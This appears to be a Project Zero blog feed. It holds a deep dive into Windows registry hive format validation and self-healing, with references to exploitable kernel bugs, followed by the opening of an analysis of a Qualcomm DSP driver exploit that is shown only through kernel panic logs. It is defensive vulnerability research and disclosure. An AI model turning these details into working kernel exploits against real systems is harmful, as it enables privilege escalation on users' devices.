    This slight quirk is the reason why the ability to create stable keys under volatile ones, which should normally not be possible, may be an exploitable condition with security impact. For details, see the "Creation of stable subkeys under volatile keys" section in the CVE-2023-21748 bug report, or the CVE-2024-26173 bug report.

    Security descriptors in app hives

    In normal registry hives, there are no artificial restrictions with regards to security descriptors. There may be an arbitrary number of them, and they may contain any type of settings the user wishes, as long as they have binary control over the hive file and/or the existing security descriptors grant them the access to change them to whatever they want. However, there are some limitations concerning security descriptors in application hives, as documented in the MSDN page of the RegLoadAppKeyA function:

    All keys inside the hive must have the same security descriptor, otherwise the function will fail. This security descriptor must grant the caller the access specified by the samDesired parameter or the function will fail. You cannot use the RegSetKeySecurity function on any key inside the hive.

    The intent behind the quote seems to be that the security settings within an app hive should be uniform and immutable; that is, remain identical to their initial state at hive creation, and consistent across all keys. There is indeed some truth to the documentation, as trying to change the security of a key within an app hive with RegSetKeySecurity, or to create a new key with a custom descriptor both result in a failure with STATUS_ACCESS_DENIED. However, the part about all keys having the same security descriptor is not actually enforced, and a user can freely load an app hive with any number of different security descriptors associated with the keys. This was reported to Microsoft as WinRegLowSeverityBugs issue #20, but wasn't deemed severe enough to be addressed in a security bulletin (which I agree with), so for now, it remains an interesting discrepancy between the documentation and implementation.

    Key values and value lists

    While keys allow software to create a data organization hierarchy, values are the means of actually storing the data. Each value is associated with one specific key, and is characterized by the following properties:

    • Name
    • Type
    • Data

    In general, values are much simpler than keys. To begin with, they are not a full-fledged object in the NT Object Manager sense: you cannot open a handle to a value, and thus you may only access one through the handle of its associated key and the value's name. They also don't have dedicated security descriptors, so a client with a key handle with KEY_QUERY_VALUE access can enumerate and read all values of the key, and the KEY_SET_VALUE right allows the caller to create/modify/delete all values within a key. For these reasons, values are best thought of as elaborate attributes of a key, not as an independent entity.

    There is no fixed limit on the number of values associated with a key other than the available hive space, which places the number at around 67 million (0x80000000 ÷ 0x20, the hive space divided by the minimum value cell size). The value list format is also not as optimized as the subkey index: it is a linear, single-level list of raw value cell indexes, without any additional metadata such as a header or hints. The list is not sorted either; values appear in the order in which they were added to the key. Finally, value name uniqueness is guaranteed on output, but not enforced on input: it is possible to load a specially crafted hive with several values sharing the same name, and contrary to duplicate keys, this doesn't seem to pose any fundamental problems for the registry implementation.

    A high-level overview of the hive cells related to a key's value list is shown below:

    Diagram showing the high-level overview of the hive cells related to a key's value list

    In the next section, we will examine the internal layout and semantics of the _CM_KEY_VALUE structure, which describes each unique value in the registry.

    The key value cell

    As usual, we can print out the structure definition in WinDbg:

    0: kd> dt _CM_KEY_VALUE

    nt!_CM_KEY_VALUE

       +0x000 Signature        : Uint2B

       +0x002 NameLength       : Uint2B

       +0x004 DataLength       : Uint4B

       +0x008 Data             : Uint4B

       +0x00c Type             : Uint4B

       +0x010 Flags            : Uint2B

       +0x012 Spare            : Uint2B

       +0x014 Name             : [1] Wchar


    Let's examine each field more closely.

    Signature

    It identifies the cell as a key value, and must be equal to 0x6B76 ('vk'). It is verified during hive load, but isn't used for anything else later on.

    NameLength and Name

    The combination of these two fields specifies the name of the value: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer that stores the name itself. Let's consider the same criteria of the name that we have previously discussed in the context of registry keys:

    • Compression: Similarly to keys, value names may be compressed if the VALUE_COMP_NAME (0x1) flag is set in _CM_KEY_VALUE.Flags. In that case, the string is stored as 8-bit ASCII characters, otherwise the normal wide-character encoding is used.
    • Length: The length of the name can be between 0 and 16,383 characters. A length of zero indicates an alias for the value displayed by Regedit as "(Default)", a remnant of the design from Windows 3.1 where data was assigned directly to keys. As a sidenote, the correct enforcement of the upper limit was only introduced in October 2022 as a fix for CVE-2022-37991.
    • Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a value name, with no exceptions. Since values are not part of the same namespace as keys, this even includes backslashes. The only constraint is that if the corresponding key is a symbolic link, then the value must be named "SymbolicLinkValue", as it has a special meaning and stores the link's target path. An example of a bug related to sanitizing value names was CVE-2024-26176.
    • Uniqueness: Value name uniqueness is not enforced on input, but it is maintained by the kernel at runtime on a best-effort basis. That means that whenever setting a value, the system will always try to reuse an existing one with the same name before creating a new one. Similarly to keys, value lookup is performed in a case-insensitive manner, but the original casing is preserved and visible to the clients.
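    Putting the compression rules together, decoding a value name from its cell could look roughly like this (a sketch, assuming the 8-bit compressed form decodes as plain ASCII):

```python
# Decode a value name depending on the VALUE_COMP_NAME flag: compressed
# names are tightly packed 8-bit ASCII characters, otherwise the name is
# regular UTF-16LE. NameLength is expressed in bytes in both cases.
VALUE_COMP_NAME = 0x1

def decode_value_name(name_bytes, name_length, flags):
    raw = name_bytes[:name_length]
    if flags & VALUE_COMP_NAME:
        return raw.decode("ascii")
    return raw.decode("utf-16-le")

assert decode_value_name(b"Version", 7, VALUE_COMP_NAME) == "Version"
assert decode_value_name("Version".encode("utf-16-le"), 14, 0) == "Version"
assert decode_value_name(b"", 0, VALUE_COMP_NAME) == ""  # the "(Default)" value
```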

    DataLength

    Specifies the length of the data stored in the value. The various ranges of the 32-bit space that the field can fall into are explained below:

    • 0x0: empty value; Data must be set to HCELL_NIL (all hive versions).
    • 0x1 – 0x3FD8: data stored directly in a backing cell pointed to by Data (all hive versions).
    • 0x3FD9 – 0xFFFFC: hive versions < 1.4: data stored directly in a backing cell pointed to by Data; hive versions ≥ 1.4: data split into 16344-byte chunks and saved in a big data object pointed to by Data.
    • 0xFFFFD – 0x3FD7C028: hive versions < 1.4: invalid; hive versions ≥ 1.4: data split into 16344-byte chunks and saved in a big data object pointed to by Data.
    • 0x3FD7C029 – 0x7FFFF000: hive versions < 1.4: invalid; hive versions ≥ 1.4: not accepted on input due to a 16-bit integer overflow in the big data chunk count; feasible to set at runtime, but the saved data will be truncated due to the same bug / design limitation.
    • 0x7FFFF001 – 0x7FFFFFFF: invalid (all hive versions).
    • 0x80000000 – 0x80000004: between 0–4 bytes stored inline in the Data field (all hive versions).
    • 0x80000005 – 0xFFFFFFFF: invalid (all hive versions).

    Data

    Responsible for storing or pointing to the data associated with the value. To summarize the table above, it can be in one of four states, depending on the data length and hive version:

    1. Empty – equal to HCELL_NIL, if DataLength is 0.
    2. Inline – stores up to four bytes in the Data member of the value cell itself, as indicated by DataLength & 0x7FFFFFFF, if the highest bit of DataLength is set. As a side effect, an empty value can be represented in two ways: either as DataLength=0 or DataLength=0x80000000.
    3. Raw data – points to a raw backing cell if Hive.Version < 1.4 or DataLength ≤ 0x3FD8.
    4. Big data – points to a big data structure introduced in hive version 1.4, which is capable of storing 0xFFFF × 0x3FD8 = 0x3FD7C028 bytes (a little under 1 GiB). More on big data cells in the section below.
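    The four states can be summarized in a small classifier. This sketch only distinguishes the valid states and omits the invalid ranges from the table above:

```python
# Classify a value's storage state from DataLength and the hive version,
# following the four cases enumerated above. Boundary constant taken from
# the DataLength table; invalid ranges are not checked in this sketch.
CM_KEY_VALUE_SMALL = 0x3FD8   # max raw backing-cell data in hive v1.4+

def data_state(data_length, hive_version):
    if data_length & 0x80000000:
        return "inline", data_length & 0x7FFFFFFF  # up to 4 bytes in Data itself
    if data_length == 0:
        return "empty", 0                          # Data must be HCELL_NIL
    if hive_version < (1, 4) or data_length <= CM_KEY_VALUE_SMALL:
        return "raw", data_length                  # single backing cell
    return "big data", data_length                 # 16344-byte chunk list

assert data_state(0, (1, 5)) == ("empty", 0)
assert data_state(0x80000000, (1, 5)) == ("inline", 0)  # second empty encoding
assert data_state(0x80000004, (1, 5)) == ("inline", 4)
assert data_state(0x1000, (1, 5)) == ("raw", 0x1000)
assert data_state(0x10000, (1, 5)) == ("big data", 0x10000)
assert data_state(0x10000, (1, 3)) == ("raw", 0x10000)  # no big data before v1.4
```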

    Type

    This field is supposed to store one of the supported value types, such as REG_DWORD, REG_BINARY, etc. We'll omit a thorough discussion of the official types, as we feel they are already well documented and understood. From a strictly technical point of view, though, it's important to note that the type is simply a hint, an extra piece of metadata that is available to a registry client with the intended purpose of indicating the nature of the value. However, Windows provides no guarantees with regards to the consistency between the value type and its data. For instance, a REG_DWORD value doesn't have to be four-bytes long (even though it conventionally is), a REG_SZ unicode string can have an odd length, and so on. Any client application that operates on user-controlled data from the registry should always check the specific properties it relies on, instead of unconditionally trusting the value type.

    Beyond this flexibility in data interpretation, there's another aspect of the Type field to consider: its potential for misuse due to its 32-bit width. The kernel generally doesn't perform any verification that its numerical value is one of the small, predefined enums (other than to ensure REG_LINK for symbolic links and REG_NONE for tombstone values), so it is possible to set it to any arbitrary 32-bit value, and have it returned in exactly the same form by system APIs such as RegQueryValueEx. If a program or driver happens to use the value type returned by the system as a direct index into an array without any prior bounds checking, this could lead to out-of-bounds reads or memory corruption. In some sense, it would probably be safest for the most critical/privileged software in the system (e.g. antivirus engines) not to use the value type at all, or only within a very limited scope.
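    The defensive pattern suggested above might look as follows. The handler table is a hypothetical client-side construct, though the low type numbers (REG_NONE = 0 through REG_DWORD = 4) match the real constants:

```python
# Why the 32-bit Type field must not be trusted as an array index: a
# client that maps type -> handler has to bounds-check first, since a
# crafted hive can report any 32-bit type value. Likewise, REG_DWORD data
# is not guaranteed to actually be four bytes long.
HANDLERS = ["none", "sz", "expand_sz", "binary", "dword"]  # indices 0..4

def handler_for_type(reg_type):
    if reg_type >= len(HANDLERS):        # reject out-of-range types
        return "unknown"
    return HANDLERS[reg_type]

def read_dword(reg_type, data):
    # Never assume REG_DWORD (4) data is 4 bytes; verify the actual length.
    if reg_type != 4 or len(data) != 4:
        return None
    return int.from_bytes(data, "little")

assert handler_for_type(4) == "dword"
assert handler_for_type(0xDEADBEEF) == "unknown"  # crafted type, safely rejected
assert read_dword(4, b"\x2a\x00\x00\x00") == 42
assert read_dword(4, b"\x2a") is None             # truncated REG_DWORD
```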

    Flags

    There are currently two supported flags that can be set on registry values:

    • VALUE_COMP_NAME (0x1) – equivalent to KEY_COMP_NAME, indicates that the value name representation is a tightly packed string of ASCII characters.
    • VALUE_TOMBSTONE (0x2) – used exclusively in differencing hives (version 1.6) to indicate that a value with the given name has been explicitly deleted and doesn't exist on this key layer. It requires that the value type is REG_NONE and it doesn't contain any data. It is equivalent to the Tombstone (1) property of a key set in the LayerSemantics field of a key node.

    Spare

    Unused member, never accessed by the kernel.

    Big data value storage

    Prior to hive version 1.4, the maximum length of a value in the registry was 1 MB, which was directly related to the maximum length of the single backing cell that would store the raw data. This limitation is documented in the Registry element size limits article:

    Registry element: Value

    Size limit:

    • Available memory (latest format) [editor's note: this is not fully accurate]
    • 1 MB (standard format)

    Here, "standard format" refers to regf v1.3. On some level, 1 MB could be considered a reasonable limit, as the registry was not designed to serve as storage for large quantities of data – at least not initially. One example of a public resource which vocalized this design decision was the old Windows registry information for advanced users article from around 2002-2003, which stated:

    Long values (more than 2,048 bytes) must be stored as files with the file names stored in the registry.

    Nevertheless, it seems that at some point during the development of Windows XP, Microsoft decided to provide the registry clients with the ability to store larger chunks of data, not bound by the somewhat arbitrary limits of the regf format. In order to facilitate this use case, a new cell type was added, called the "big data". Conceptually, it is simply a means of dividing one long data blob into smaller portions of 16344 bytes, each stored in a separate cell. It replaces the single backing cell with a _CM_BIG_DATA structure defined as follows:

    0: kd> dt _CM_BIG_DATA

    nt!_CM_BIG_DATA

       +0x000 Signature        : Uint2B

       +0x002 Count            : Uint2B

       +0x004 List             : Uint4B


    The signature is set to 0x6264 ('db') and verified on hive load, but otherwise not used. The count represents the number of 16344-byte chunks making up the overall value, and is generally supposed to be set to an integer between 2–65535. If it was set to 0, that would mean that the value is empty, so the big data object shouldn't be present at all; if it was equal to 1, a direct backing buffer should have been used instead, so such a construct would also be invalid. Neither zero nor one is thus accepted by the hive loader, but it is technically possible to set these values at runtime by abusing the aforementioned integer overflow bug. We haven't found any security impact of this behavior other than it being a correctness error, though.

    The last element of the structure, List, is a cell index to a basic array of cell indexes making up the value chunks. Its format is equivalent to that of the value list, which also stores just the HCELL_INDEX values without any headers or additional information. Furthermore, every chunk other than the last one must contain exactly 16344 bytes. If the length of the overall value is not divisible by 16344, the final chunk contains the remaining 1–16343 bytes. The layout of the big data object and its associated cells is shown in the diagram below:

    The layout of the big data object and its associated cells
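    The chunking arithmetic is straightforward to sketch:

```python
# Big data chunking: every chunk except possibly the last holds exactly
# 16344 (0x3FD8) bytes; the final chunk carries the 1-16343 byte remainder.
CHUNK = 16344

def big_data_chunks(blob):
    return [blob[i:i + CHUNK] for i in range(0, len(blob), CHUNK)]

blob = b"A" * (2 * CHUNK + 100)        # two full chunks + 100-byte tail
chunks = big_data_chunks(blob)
assert len(chunks) == 3
assert all(len(c) == CHUNK for c in chunks[:-1])
assert len(chunks[-1]) == 100
# The theoretical maximum: 0xFFFF chunks of 0x3FD8 bytes each.
assert 0xFFFF * 0x3FD8 == 0x3FD7C028
```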

    This concludes the part about the internal format of registry hives.

    The hive loading and sanitization process

    The hive loading process implemented by the NtLoadKey* family of system calls is a long and complex operation. It involves opening the hive file, loading it in memory, verifying its integrity, optionally recovering state from transactional log files, allocating any related kernel objects, attaching the hive to the global registry tree, and optionally opening a handle to the hive root and returning it to the caller. In this blog post, we are particularly interested in the hive sanitization part. Understanding this portion of the registry code is like consulting the official specification – or even better, as the code doesn't lie and is essentially the ground truth of what is and isn't accepted as valid data. Furthermore, it provides us with a number of hints as to which properties of the format are imperative to the correct functioning of the database, and which ones are more conventional, and don't have any serious consequences even if broken. The goal of this section is to discuss the overall control flow of loading a hive and performing the initial pass of sanitization. By documenting which internal routines are responsible for which checks, we hope to make it easier for other security researchers to navigate the hive loading code, providing a good starting point for their own investigations.

    The registry, as a logical structure, is built on top of several lower-layer abstractions, each of which has a number of invariants that must hold in order for the hive to be considered valid, and in order for operations being performed on the hive to be safe. This is illustrated in the pyramid below, with the most foundational requirements placed at the bottom, and the increasingly more general aspects of hive integrity towards the top:

    Diagram in the shape of a pyramid, with five levels. The base level showing the hive header, bin and cell layout consistency, and the top level showing Correctness of global hive properties, with all levels described below this image with examples

    Let's consider some examples of validity checks at each level, starting with the most fundamental ones:

    1. Hive header, bin and cell layout consistency
      • Validity of the hive version, length, root cell index, flags in the header.
      • Existence of at least one bin in the hive.
      • Validity of each bin's header, particularly the file offset and size.
      • Validity of cells: aligned to eight bytes, within the bounds of the bin, completely filling out the bin.
    2. Intra-cell consistency
      • Sufficient size of each cell with regard to the data it stores: at least the minimum size for the cell type (e.g. 0x4e for the key node), plus enough room for any variable-length internal arrays, such as the key name or value name.
      • Correct signatures being set for every kind of cell depending on its function.
      • Valid combinations of flags being set in key nodes and values.
      • Strings (key names, value names) adhering to the format requirements regarding minimum and maximum lengths, charset, etc.
    3. Inter-cell consistency
      • Valid references to cells in cell indexes, and each allocated cell only being used for one specific purpose.
      • Consistency between copies of redundant data in separate cells: e.g. _CM_KEY_NODE.SubKeyCounts[...] vs. the length of the subkey index.
      • Consistency between length markers in one cell vs. the amount of data stored in the corresponding backing buffer (e.g. _CM_KEY_VALUE.DataLength vs. length of the data stored in the raw data cell / big data cell).
      • Correct hints in subkey indexes (fast leaves, hash leaves).
      • Correct reference counts in the security descriptors.
    4. Structural correctness of high-level constructs
      • Consistency of the linked list of security descriptors.
      • Subkeys being laid out in a lexicographical order in all subkey indexes.
      • Symbolic link keys having a single value named "SymbolicLinkValue" of type REG_LINK.
      • Subkeys in the stable space always having a non-volatile parent.
    5. Correctness of global hive properties
      • Each hive always containing at least one key (the root key) and at least one security descriptor.
      • Only the root of the hive, and no other key having the KEY_HIVE_ENTRY flag set.
      • The depth of the hive's tree structure being a maximum of 512 levels.
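To make the level-1 checks more tangible, here is a minimal sketch of walking the cells of one bin, in the spirit of HvpEnlistFreeCells. It relies on two regf facts described earlier (a 0x20-byte bin header, and a signed 32-bit cell size field where negative values mark allocated cells); the function name and the minimum size of 8 bytes used here are simplifying assumptions of mine, not the kernel's exact logic:

```python
import struct

HBIN_HEADER_SIZE = 0x20  # every bin starts with a 32-byte header

def cells_fill_bin(bin_data: bytes) -> bool:
    """Check the fundamental cell-layout invariants of a single bin:
    each cell size is a multiple of 8, at least 8 bytes, stays within
    the bin, and the cells completely fill it out."""
    off = HBIN_HEADER_SIZE
    while off < len(bin_data):
        # First field of every cell: signed 32-bit size
        # (negative = allocated, positive = free).
        (size,) = struct.unpack_from("<i", bin_data, off)
        length = abs(size)
        if length < 8 or length % 8 or off + length > len(bin_data):
            return False
        off += length
    return off == len(bin_data)

# One allocated 0x20-byte cell followed by one free cell filling the rest
# of a 0x1000-byte bin:
bin_blob = (b"\x00" * 0x20 +
            struct.pack("<i", -0x20) + b"\x00" * 0x1c +
            struct.pack("<i", 0x1000 - 0x40) + b"\x00" * (0x1000 - 0x44))
print(cells_fill_bin(bin_blob))  # True
```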

    As we can see, there are a variety of constraints that require verification when loading a hive, with the more abstract ones relying on the lower-layer ones to be confirmed first. This explains why the process is by far the most complex operation one can perform on the registry, spanning thousands of lines of code and dozens of functions. To better illustrate this process, I've outlined the most important hive validation functions below, indented to show their hierarchical relationships as they execute in the kernel:

    • NtLoadKey* → CmLoadDifferencingKey → CmLoad(App)Key
      • CmpCmdHiveOpen → CmpInitHiveFromFile → CmpCreateHive
        • HvHiveStartFileBacked → HvLoadHive
          • HvpGetHiveHeader
          • HvAnalyzeLogFiles
          • HvpPerformLogFileRecovery
          • HvpRemapAndEnlistHiveBins
            • HvpValidateLoadedBin
            • HvpEnlistFreeCells
        • CmCheckRegistry
          • HvCheckHive
            • HvCheckBin
          • CmpValidateHiveSecurityDescriptors
          • CmpCheckRegistry2
            • CmpCheckKey
              • CmpCheckValueList
              • CmpCheckLeaf
            • CmpCheckLexicographicalOrder
            • CmpCheckAndFixSecurityCellsRefcount
      • CmpLoadKeyCommon
        • CmpLinkHiveToMaster
          • ObOpenObjectByName → ... <NT Object Manager> ... → CmpParseKey → CmpDoParseKey
            • CmpUpdateHiveRootCellFlags

    Here is a short summary of each of the above functions, according to my own analysis and understanding:


    NtLoadKey*

    The four syscall entry points for loading registry hives, as discussed in the previous post: NtLoadKey, NtLoadKey2, NtLoadKeyEx, NtLoadKey3.

    CmLoadDifferencingKey

    A generic function for loading hives – not just differencing ones but every kind, contrary to what the name might suggest. Other than the syscall handlers, it is also called by VrpPreLoadKey and VrpLoadDifferencingHive, which are parts of the VRegDriver. It is responsible for sanitizing the input flags, checking the privileges of the caller, calling registry callbacks, invoking specialized functions to actually load the hive, and opening a handle to the root of the hive if the caller requested it.

    CmLoadKey,
    CmLoadAppKey

    Functions implementing the core functionality of loading normal and app hives, respectively. They are responsible for coordinating lower-layer loading functions, resolving any conflicts related to the hive file / registry mount path, and inserting the hive-related objects into the corresponding kernel data structures. In terms of opening and validating the binary hive representation, they are virtually equivalent.

    CmpCmdHiveOpen,
    CmpInitHiveFromFile,
    CmpCreateHive

    Functions dedicated to opening the hive file on disk, loading it in memory, validating its integrity and allocating the internal kernel structures (_CMHIVE and other objects representing the hive).

    HvHiveStartFileBacked,
    HvLoadHive

    Common functions for loading and sanitizing the hive on the level of header, bins and cells (the lowest level of the pyramid).

    HvpGetHiveHeader

    Reads and validates the hive header, trying to determine if it is valid or corrupted, and whether the header or hive data need to be recovered from a log file.

    HvAnalyzeLogFiles,
    HvpPerformLogFileRecovery

    The two most important functions related to data recovery from log files: the first determines which of the two files (.LOG1/.LOG2) to use, and the second actually applies the log file entries to the hive mapping in memory.

    HvpRemapAndEnlistHiveBins,
    HvpValidateLoadedBin,
    HvpEnlistFreeCells

    Functions responsible for re-mapping the hive after log file recovery, in order to ensure that every bin is mapped as a continuous block of memory. During the process, the validity of all bins and the layout of their cells is verified.

    CmCheckRegistry

    A generic function encompassing the verification of levels ≥ 2 of the pyramid, i.e. everything about the hive that defines its logical structure and is not related to memory management. If any self-healing occurs during the process, the function restarts its logic, so it may potentially take multiple iterations before a corrupted hive is fixed up and accepted as valid.

    HvCheckHive,
    HvCheckBin

    Two functions responsible for validating the bin headers and layout of their cells. As you may have noticed, this part of their functionality is redundant with HvpValidateLoadedBin and HvpEnlistFreeCells. The difference is that the earlier functions are used to cache information about the positions of free cells in the hive, to optimize the allocation process later on. On the other hand, the underlying purpose of HvCheckHive and HvCheckBin is to generate a bitmap object (RTL_BITMAP) that indicates the positions of allocated cells, in order to ensure the validity of cell indexes when sanitizing the hive, and to make sure that every cell is only used for a single purpose in the hive.

    As a side note, there is an amusing bug in HvCheckBin related to verifying cell size correctness, but it seems to be non-exploitable precisely because the same sanitization is correctly performed earlier in HvpEnlistFreeCells.

    CmpValidateHiveSecurityDescriptors

    The function traverses the linked list of security descriptor cells, and verifies its consistency (the correctness of the Flink/Blink indexes) and the validity of the security descriptor blobs. At the same time, it also caches information about the descriptors in internal kernel structures, so that they can be quickly looked up when verifying the _CM_KEY_NODE.Security fields, and later at system run time.

    CmpCheckRegistry2

    A function responsible for performing a single attempt at validating the entire key structure. There are several possible return codes:

    • STATUS_SUCCESS if the hive validation passes without problems,
    • STATUS_REGISTRY_HIVE_RECOVERED if minor corruption was encountered, but it was successfully fixed in-place,
    • STATUS_RETRY if a badly corrupted key was encountered and removed from its parent's subkey index. This causes CmCheckRegistry to restart the validation process from scratch.
    • STATUS_REGISTRY_CORRUPT if the hive was found to be corrupted beyond repair.
    • Other problem-specific error codes such as STATUS_NO_LOG_SPACE or STATUS_INSUFFICIENT_RESOURCES, which cause the loading process to be aborted.

    CmpCheckKey

    This is the central function in the hive sanitization process, with more than a thousand lines of code in decompiled output, and likely just as many in the original source code. It essentially checks the validity of all fields within a specific key node, and also orchestrates the validation of the value list and subkey index associated with the key. If there was one function I would recommend analyzing to better understand the regf format, it would be this one.

    CmpCheckValueList

    Checks the consistency of a value list, each of the value cells on the list, and their backing buffers / big data objects.

    CmpCheckLeaf

    Validates a specific leaf subkey index, i.e. one of 'li', 'lf', 'lh'. This includes checking the cell size, signature, validity of the subkey cell indexes and their hint values.

    CmpCheckLexicographicalOrder

    Compares the names of two consecutive subkeys to determine whether the second is lexicographically greater than the first, in order to ensure the correct sorting of a subkey index.

    CmpCheckAndFixSecurityCellsRefcount

    Iterates over all security descriptors in the hive, compares their refcounts loaded from disk with the values independently re-calculated while sanitizing the key tree, and corrects them if they are unequal. Since November 2024, it also frees any unused security descriptors with the reference count set to zero (they had been previously allowed, as described in WinRegLowSeverityBugs issue #10).

    CmpUpdateHiveRootCellFlags

    The function makes sure that the root key of the hive has the KEY_NO_DELETE and KEY_HIVE_ENTRY flags set. Interestingly, these flags are the only aspect of the regf format that is not enforced directly while loading the hive (in CmpCheckKey), but only at a later stage when the hive is being mounted in the global registry view.
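The ordering check performed by CmpCheckLexicographicalOrder can be sketched roughly as follows. This is a simplification that assumes registry names compare case-insensitively by upcasing both sides; the function name is mine:

```python
def subkey_index_sorted(names: list[str]) -> bool:
    """Verify that consecutive subkey names are strictly increasing
    under a case-insensitive comparison, as required for lookups over
    a subkey index to behave correctly."""
    upcased = [n.upper() for n in names]
    return all(a < b for a, b in zip(upcased, upcased[1:]))

print(subkey_index_sorted(["Alpha", "beta", "Gamma"]))  # True
print(subkey_index_sorted(["beta", "Alpha"]))           # False
```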

    Self-healing properties

    The Windows implementation of the registry has the unique property that it is self-healing: the system tries very hard to successfully load a hive even if it's partially corrupted. My guess is that the reason for this design was to make the mechanism resilient against random data corruption on disk, as failure to load a system hive early during start-up would make Windows unusable. Perhaps it was decided that it was a better tradeoff to forcefully remove the broken parts of the file, with the hope that they would be automatically re-created later at run time, or that they weren't very important to begin with and the system/applications could continue to function correctly without them. And even if not, giving the user a chance to troubleshoot the problem or recover their data would still be a better outcome than bricking the machine completely.

    Consequently, whenever an error is detected by the hive loading logic, it is handled in one of several ways, depending on the nature of the problem:

    • Bin recreation: if HvpValidateLoadedBin indicates that any part of a bin header is corrupted, then HvpRemapAndEnlistHiveBins re-initializes it from scratch, and declares it as 4096 bytes long (regardless of the previous length).
    • Cell recreation: if HvpEnlistFreeCells detects a cell with an invalid length, it converts it to a single free cell spanning from the current offset until the end of the bin, potentially erasing any other data/cells previously residing in that region.
    • Small, direct fix: if a single field within a key node is found to have an invalid state, and the good/expected state is known to the kernel, the problem gets fixed by directly overwriting the old value with the correct one. Examples include cell signatures and mandatory/illegal flags.
    • Single value deletion: if any inconsistencies are found in a value cell or its associated data cell(s), the specific value is removed from the key's value list.
    • Deletion of entire value list: if the descriptor of a value list (i.e. its cell index or length) is invalid, or if a symbolic link contains more than one value, the entire value list of the key is cleared.
    • Single key deletion: if an irrecoverable problem is found within a key node (e.g. invalid cell index, invalid cell length, invalid name), then it is removed from its parent's subkey index, and the key tree validation process is restarted from scratch.
    • Deletion of entire subkey index: if any irrecoverable problem is found in a subkey index, it is deleted, and the subkey list of its associated key is cleared.
    • Security descriptor list reset: if any errors are detected in the list of security descriptors (bad Flink/Blink indexes or invalid binary format), the set of descriptors in the hive is reduced to the single root descriptor, which will then be inherited by all the keys in the hive.
    • Rejection of entire hive: if any issues are found with the fundamental parts of the regf format or its properties (heavily corrupted header, missing bins, invalid root key, invalid root security descriptor), the loading of the hive is completely aborted.
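The restart-on-key-deletion behavior of CmCheckRegistry can be sketched as a simple retry loop. The status constants and names here are illustrative stand-ins based on the description above, not the kernel's actual definitions:

```python
STATUS_SUCCESS, STATUS_RETRY = 0, 1

def check_registry(validate_pass) -> tuple[int, int]:
    """Re-run the key-tree validation pass until it no longer reports
    STATUS_RETRY (i.e. until no more corrupted keys are being removed).
    Returns the final status and the number of passes taken."""
    passes = 0
    while True:
        passes += 1
        status = validate_pass()
        if status != STATUS_RETRY:
            return status, passes

# A hive with two badly corrupted keys takes three passes in total:
results = iter([STATUS_RETRY, STATUS_RETRY, STATUS_SUCCESS])
print(check_registry(lambda: next(results)))  # (0, 3)
```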

    As we can see, Windows implements a very defensive strategy and always attempts to either fix the corrupted data, or isolate the damage by deleting the affected object while preserving the overall hive integrity. Only when these repair attempts are exhausted does the kernel abort the loading process and return an error. This resilience can lead to situations where a freshly loaded hive is already in a "dirty" state, requiring the system to immediately flush its self-applied corrections to disk to maintain consistency.

    One particularly interesting bug related to the self-healing process was CVE-2023-38139. To reproduce the issue, the self-healing logic would have to be triggered a large number of times (in the case of my PoC, 65535 times) in order to cause a 32-bit integer overflow of a security descriptor refcount, and later a UAF condition. I have also abused the behavior to demonstrate WinRegLowSeverityBugs #13, in which a key with an empty name would be removed during load, freeing up a reference to a security descriptor and resulting in the refcount being equal to zero upon loading. Overall, the self-healing property of the registry is not the most critical, but one that I find quite fascinating and certainly worth keeping in mind as part of one's toolbox when researching this subsystem.

    Conclusion

    Congratulations on reaching the end! This post aimed to systematically explore the inner workings of the regf format, focusing on the hard requirements enforced by Windows. Due to my role and interests, I looked at the format from a strictly security-oriented angle rather than digital forensics, which is the context in which registry hives are typically considered. Hopefully, this deep dive clarifies some of the intricacies of the hive format and complements existing unofficial documentation.

    Keep in mind that hives store their data in the regf files on disk, but Windows also creates multiple auxiliary kernel objects for managing and caching this data once loaded. The next post in the series will discuss these various objects, their relationships, lifecycle, and, naturally, their impact on system security. Stay tuned!


    The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit

    December 16, 2024, 03:11

    Posted by Seth Jenkins, Google Project Zero

    This blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty’s report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis!

    Introduction

    Earlier this year, Google's TAG received some kernel panic logs generated by an In-the-Wild (ITW) exploit. Those logs kicked off a bug hunt that led to the discovery of 6 vulnerabilities in one Qualcomm driver over the course of 2.5 months, including one issue that TAG reported as ITW. This blog post covers the details of the original artifacts, each of the bugs discovered, and the hypothesized ITW exploit strategy gleaned from the logs.

    Artifacts

    Usually, when successfully reverse-engineering an ITW exploit, Project Zero/TAG have had access to the exploit sample itself, so determining which vulnerability was exploited was primarily a matter of time and effort. However, in this particular case, we received several kernel panic logs but unfortunately not the exploit sample. This meant we could not directly reproduce crashes or reverse engineer what bug was being exploited.

    Accurately determining what vulnerability an exploit uses working only off of crash logs and without the exploit itself can range in difficulty from highly plausible to impossible. I decided to give it a try and see what I could learn. Out of the 6 panics we received, 4 panics in particular contained potentially useful information:

    Log 1:

    [   47.223480] adsprpc: fastrpc_init_process: untrusted app trying to attach to privileged DSP PD

    [   47.254494] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [   47.254512] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [   47.261488] adsprpc: mapping not found to unmap fd 0xa, va 0x0, len 0x0

    ...

    [   50.865579] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000

    [   50.865586] Mem abort info:

    [   50.865590]   ESR = 0x96000006

    [   50.865593]   Exception class = DABT (current EL), IL = 32 bits

    [   50.865597]   SET = 0, FnV = 0

    [   50.865600]   EA = 0, S1PTW = 0

    [   50.865603] Data abort info:

    [   50.865606]   ISV = 0, ISS = 0x00000006

    [   50.865609]   CM = 0, WnR = 0

    [   50.865614] user pgtable: 4k pages, 39-bit VAs, pgdp = 00000000f66703d3

    [   50.865617] [0000000000000000] pgd=0000000213147003, pud=0000000213147003, pmd=0000000000000000

    [   50.865624] Internal error: Oops: 96000006 [#1] PREEMPT SMP

    ...

    [   50.865649] Process falcon (pid: 8909, stack limit = 0x000000000e91af69)

    [   50.865654] CPU: 5 PID: 8909 Comm: falcon Tainted: G S      W  O      4.19.157-perf-g8779875ad741 #1

    [   50.865657] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [   50.865661] pstate: 00400005 (nzcv daif +PAN -UAO)

    [   50.865669] pc : __list_del_entry_valid+0x34/0xd0

    [   50.865672] lr : dma_buf_detach+0x34/0xa0

    [   50.865675] sp : ffffff802c7bb990

    ...

